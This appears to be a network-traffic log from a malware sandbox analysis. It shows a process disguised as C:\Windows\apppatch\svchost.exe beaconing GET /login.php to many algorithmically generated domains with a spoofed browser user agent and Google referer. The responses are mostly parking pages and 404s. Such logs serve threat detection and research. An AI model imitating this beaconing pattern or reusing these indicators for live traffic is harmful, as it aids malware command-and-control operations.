Nov 11, 2024 18:26:04.273001909 CET | 165 | IN | HTTP/1.1 304 Not Modified
                                                                                                                                                                                                          server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                          etag: "63f68860-251"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.8 | 53556 | 76.223.67.189 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:03.842987061 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qexyhuv.com
Nov 11, 2024 18:26:04.267445087 CET | 259 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 114
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.8 | 57970 | 103.224.212.210 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:03.996807098 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lyxynyx.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
Nov 11, 2024 18:26:04.544084072 CET | 244 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww25.lyxynyx.com/login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.8 | 53557 | 103.224.182.252 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:04.015799999 CET | 277 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: vofycot.com
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
Nov 11, 2024 18:26:04.455413103 CET | 242 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          server: Apache
                                                                                                                                                                                                          location: http://ww16.vofycot.com/login.php?sub1=20241112-0426-044d-b465-1d078f2f97da
                                                                                                                                                                                                          content-length: 2
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          connection: close
                                                                                                                                                                                                          Data Raw: 0a 0a
                                                                                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.8 | 57971 | 44.221.84.105 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:04.045885086 CET | 352 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: gadyciz.com
                                                                                                                                                                                                          Cookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345856|1731345856|0|1|0; snkz=66.23.206.109
Nov 11, 2024 18:26:04.475816011 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Set-Cookie: btst=5e81f1ad7c4a96c1877df991163ec825|66.23.206.109|1731345964|1731345856|54|2|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.8 | 57972 | 154.85.183.50 | 80 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:04.185092926 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Nov 11, 2024 18:26:04.993554115 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Nov 11, 2024 18:26:04.995773077 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyval.com
Nov 11, 2024 18:26:05.281321049 CET | 307 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:26:05 GMT
                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                          Content-Length: 138
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          ETag: "663ee226-8a"
                                                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 70 | Source IP: 192.168.2.8 | Source Port: 57973 | Destination IP: 64.190.63.136 | Destination Port: 80 | PID: 1736 | Process: C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:04.887339115 CET | 348 | OUT | GET /login.php?sub1=20241112-0426-044d-b465-1d078f2f97da HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww16.vofycot.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5179536
Nov 11, 2024 18:26:05.648591042 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:05 GMT
                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Q1k8kRQkx7GYldKqm6G66ZCGDPL+fk/3vRypBjrJ9ShFMKyCkbf+DQKz062LphT3LNwViHoDPbAaUnXL159X0g==
                                                                                                                                                                                                          last-modified: Mon, 11 Nov 2024 17:26:05 GMT
                                                                                                                                                                                                          x-cache-miss-from: parking-7596689c44-xfc25
                                                                                                                                                                                                          server: Parking/1.0
                                                                                                                                                                                                          Data Ascii: 2E2<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Q1k8kRQkx7GYldKqm6G66ZCGDPL+fk/3vRypBjrJ9ShFMKyCkbf+DQKz062LphT3LNwViHoDPbAaUnXL159X0g==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and bes


Session ID: 71 | Source IP: 192.168.2.8 | Source Port: 57974 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 1736 | Process: C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:26:04.950685978 CET | 350 | OUT | GET /login.php?subid1=20241112-0426-0467-9c46-ef7d79ef9150 HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: ww25.lyxynyx.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          Cookie: __tad=1731345856.5241611
Nov 11, 2024 18:26:05.378601074 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          date: Mon, 11 Nov 2024 17:26:04 GMT
                                                                                                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                                                                                                          content-length: 1230
                                                                                                                                                                                                          x-request-id: 5450a102-4178-42f0-afb6-0ca64284b6c5
                                                                                                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QpNJdqUhZXnXlrq/8H6wuNUKASxlqJ3BCCrAIz168Ow6tRjKayJDs6tqR9ZIw71ONf1TUssBozjso789OHLhhQ==
                                                                                                                                                                                                          set-cookie: parking_session=5450a102-4178-42f0-afb6-0ca64284b6c5; expires=Mon, 11 Nov 2024 17:41:05 GMT; path=/
                                                                                                                                                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QpNJdqUhZXnXlrq/8H6wuNUKASxlqJ3BCCrAIz168Ow6tRjKayJDs6tqR9ZIw71ONf1TUssBozjso789OHLhhQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Nov 11, 2024 18:26:05.378618002 CET | 664 | IN
                                                                                                                                                                                                          Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTQ1MGExMDItNDE3OC00MmYwLWFmYjYtMGNhNjQyODRiNmM1IiwicGFnZV90aW1lIjoxNzMxMzQ1OTY1LCJwYWdlX3VybCI6I


Session ID: 0 | Source IP: 192.168.2.8 | Source Port: 49718 | Destination IP: 75.2.71.199 | Destination Port: 443 | PID: 1736 | Process: C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:06 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: puzylyp.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-11-11 17:24:06 UTC | 352 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                          Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:06 GMT
                                                                                                                                                                                                          Etag: "8c9v1ec68j19wv"
                                                                                                                                                                                                          Server: Caddy
                                                                                                                                                                                                          Server: awselb/2.0
                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                          X-Powered-By: Next.js
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49720 | 188.114.96.3 | 443 | 1736 | C:\Windows\apppatch\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:07 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:24:07 UTC | 953 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYkiumj9Wri0p%2FHZplvKPW1E887pxGPL%2Fve25cBv%2FCZX7RKytpcypjUou6i7KWdhFM7ABooZ6gocQb6IHrRz1FT%2BKaVNw0I%2BpNhXlEJvy4rUJrUU%2Fvb6ZOADciN9Kw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff959587e431b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1913&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=1472292&cwnd=251&unsent_bytes=0&cid=a5f7d7368a388f6b&ts=740&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49721 | 188.114.96.3 | 443 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:08 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qegyhig.com
Connection: Keep-Alive
2024-11-11 17:24:10 UTC | 942 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FMycW30pxHHKMJHbMi3bkKygzaaSW2Dd8CvJHnYZnxVEND1IoKWJLh5mvDmAkyHUXZVTotwdFu036qMz3BEHiBKeqXvOpVjNBXudTSOHbQ6Mxhc4echZWYmip6uPg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff963287c6a55-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1392&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2064148&cwnd=228&unsent_bytes=0&cid=3ebd3af10c63491a&ts=1252&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | 1736 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:24:11 UTC | 267 | OUT | GET /login.php HTTP/1.1
Referer: http://www.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysyvan.com
Connection: Keep-Alive
2024-11-11 17:24:13 UTC | 1094 | IN | HTTP/1.1 404 Not Found
Date: Mon, 11 Nov 2024 17:24:13 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
vary: Accept-Encoding
expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
server-timing: amp_sanitizer;dur="56.7",amp_style_sanitizer;dur="28.1",amp_tag_and_attribute_sanitizer;dur="21.7",amp_optimizer;dur="32.0"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUoQnXRVY3CgeyMCB8nOONIE6bogyARv%2FN0RB8yvbY7gL3Ja3wFWErCPHzd4hx%2FOQYJ%2BCNy%2BBN0I%2FQh3tEDNLUSF%2F7AwSUpMDh5fcMtJJ8agfTMjMeV6BNJ4lRsvWA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e0ff9742bc02363-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=1931954&cwnd=251&unsent_bytes=0&cid=15fdb27d35db04cb&ts=1990&x=0"
                                                                                                                                                                                                          Data Ascii: low:hidden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-acco


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
4             192.168.2.8    49729          188.114.97.3      443                 1736    C:\Windows\apppatch\svchost.exe
Timestamp                  Bytes transferred    Direction    Data
2024-11-11 17:24:14 UTC    267                  OUT          GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: lysyvan.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-11-11 17:24:16 UTC    1096                 IN           HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:16 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          server-timing: amp_sanitizer;dur="40.2",amp_style_sanitizer;dur="17.0",amp_tag_and_attribute_sanitizer;dur="19.1",amp_optimizer;dur="16.5"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y18DXrT%2F9z8DtBA23h%2FX3H52NNln7eEl6sslKjOcPSZB3RDBDEvP8rIj%2BWLHipysLFQPIKan28%2FIalWX0p%2Bzfb4GY%2BvGK4lyVAa4rJ4Poca7oeVw9%2F7c3ykdb7hhXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff985994bc420-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1127&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=2445945&cwnd=250&unsent_bytes=0&cid=47a52306f7354900&ts=1809&x=0"


Session ID    Source IP      Source Port    Destination IP    Destination Port
5             192.168.2.8    63211          188.114.96.3      443
Timestamp                  Bytes transferred    Direction    Data
2024-11-11 17:24:28 UTC    267                  OUT          GET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
2024-11-11 17:24:28 UTC    951                  IN           HTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Mon, 11 Nov 2024 17:24:28 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FV%2F0CO4X%2BNUM2MVKtEbAmAMlFZfeD06dqRZx%2FWrfPyim6RXSsXZdpWofdYr6oGBl3fXciDO%2FtQ9hl56jZcLYaqFawr20HIjWLvmh98eRHHcycRJf%2B9Eq5aZq9tvqJg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8e0ff9dc19cac461-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1273&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2485836&cwnd=251&unsent_bytes=0&cid=8328a6600c482dbd&ts=825&x=0"
                                                                                                                                                                                                          Data Ascii: concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);</script><link rel='stylesheet' id='astra-theme-css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74
                                                                                                                                                                                                          Data Ascii: te-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font
                                                                                                                                                                                                          2024-11-11 17:24:28 UTC1369INData Raw: 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65
                                                                                                                                                                                                          Data Ascii: :-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-ne
